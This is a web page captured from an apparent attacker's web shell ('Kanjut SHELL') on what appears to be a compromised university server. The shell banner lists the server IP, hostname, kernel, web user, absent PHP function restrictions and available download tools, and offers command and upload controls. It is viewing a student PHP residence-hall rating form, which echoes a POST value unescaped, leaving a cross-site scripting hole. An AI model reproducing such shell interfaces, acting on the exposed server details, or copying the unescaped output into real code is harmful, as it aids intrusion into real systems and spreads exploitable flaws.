Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.145.76.159
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/akshoop/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/akshoop/www/rateMyResidenceHall3.php
<html>
<head>
<style>
body {
  font-family: "Apple Chancery", cursive;
  background-color: white;
  margin: 0;
}

ul {
  list-style-type: none;
  height: 100%;
  width: 250px;
  position: fixed;
  top: 0;
  left: 0;
  background-color: #555;
  overflow: auto;
  padding-top:20px;
  padding: 0;
  margin: 0;
}

li a {
  display: block;
  color: white;
  padding: 6px 8px 6px 16px;
  text-decoration: none;
  font-size: 20px;
  width: 100%;
  text-align: left;
  cursor: pointer;
}

li a.active {
  background-color: #81a4db;
  color: white;
}

li a:hover:not(.active) {
  background-color: #81a4db;
  color: white;
}
</style>
</head>
<body>

<ul>
  <li><a href="projectIndex.html">Home</a></li>
  <li><a href="housingInformation.html">Information</a></li>
  <li><a class="active" href="rateMy.html">Rating Forms</a></li>
  <li><a href="rateMyTable.html">Tables</a></li>
  <li><a href="FAQs.html">FAQs</a></li>
  <li><a href="admin.html">Admin Login</a></li>
</ul>

<div style="margin-left:250px;padding:0px 10px;height:1000px;font-size: 20px;">
  <h2>Rate my Residence Hall.</h2>
<CENTER>
	<h3>
<?php
	session_start();

	$village = $_SESSION["village"];
	$hall = $_POST["hall"];
	$_SESSION["hall"] = $hall;

	print "You are evaluating $hall in ";
	if($village == "Honors Village (IV)")
	   print "the ";
	print "$village<BR>";
?>	

	Information Incorrect?<BR>
	<a href="rateMyResidenceHall.html">Change my Village</a><BR>
	<a href="rateMyResidenceHall2.php">Change my Residence Hall</a><BR>
	<BR>
	The first questions are regarding your Village.<BR>	
	<FORM action=rateMyResidenceHall4.php method=post>
	<BR>The average walk to class.<BR>
	0 (A very short walk)
	<INPUT type=radio name=walk value=0>
	<INPUT type=radio name=walk value=1>
	<INPUT type=radio name=walk value=2>
	<INPUT type=radio name=walk value=3>
	<INPUT type=radio name=walk value=4>
	<INPUT type=radio name=walk value=5>
	5 (A very long walk)<BR>

        <BR>The amount of sunlight.<BR>   
        0 (A little sunlight)
        <INPUT type=radio name=sunlight value=0>               
        <INPUT type=radio name=sunlight value=1>     
        <INPUT type=radio name=sunlight value=2>     
        <INPUT type=radio name=sunlight value=3>
        <INPUT type=radio name=sunlight value=4>
        <INPUT type=radio name=sunlight value=5>
        5 (A lot of sunlight)<BR>

        <BR>The nature.<BR>   
        0 (A little bit of nature)
        <INPUT type=radio name=nature value=0>               
        <INPUT type=radio name=nature value=1>     
        <INPUT type=radio name=nature value=2>     
        <INPUT type=radio name=nature value=3>
        <INPUT type=radio name=nature value=4>
        <INPUT type=radio name=nature value=5>
        5 (A lot of nature)<BR>

	<BR>The noise level.<BR>
        0 (Very quiet)
        <INPUT type=radio name=noise value=0>
        <INPUT type=radio name=noise value=1>
        <INPUT type=radio name=noise value=2>
        <INPUT type=radio name=noise value=3>
        <INPUT type=radio name=noise value=4>
        <INPUT type=radio name=noise value=5>
        5 (Very loud)<BR>

	<INPUT type=submit value="Submit">
	<INPUT type=reset value="Reset">
	</FORM>

	</h3>
</CENTER>
</div>

</body>
</html>


Stv3n404 - 2023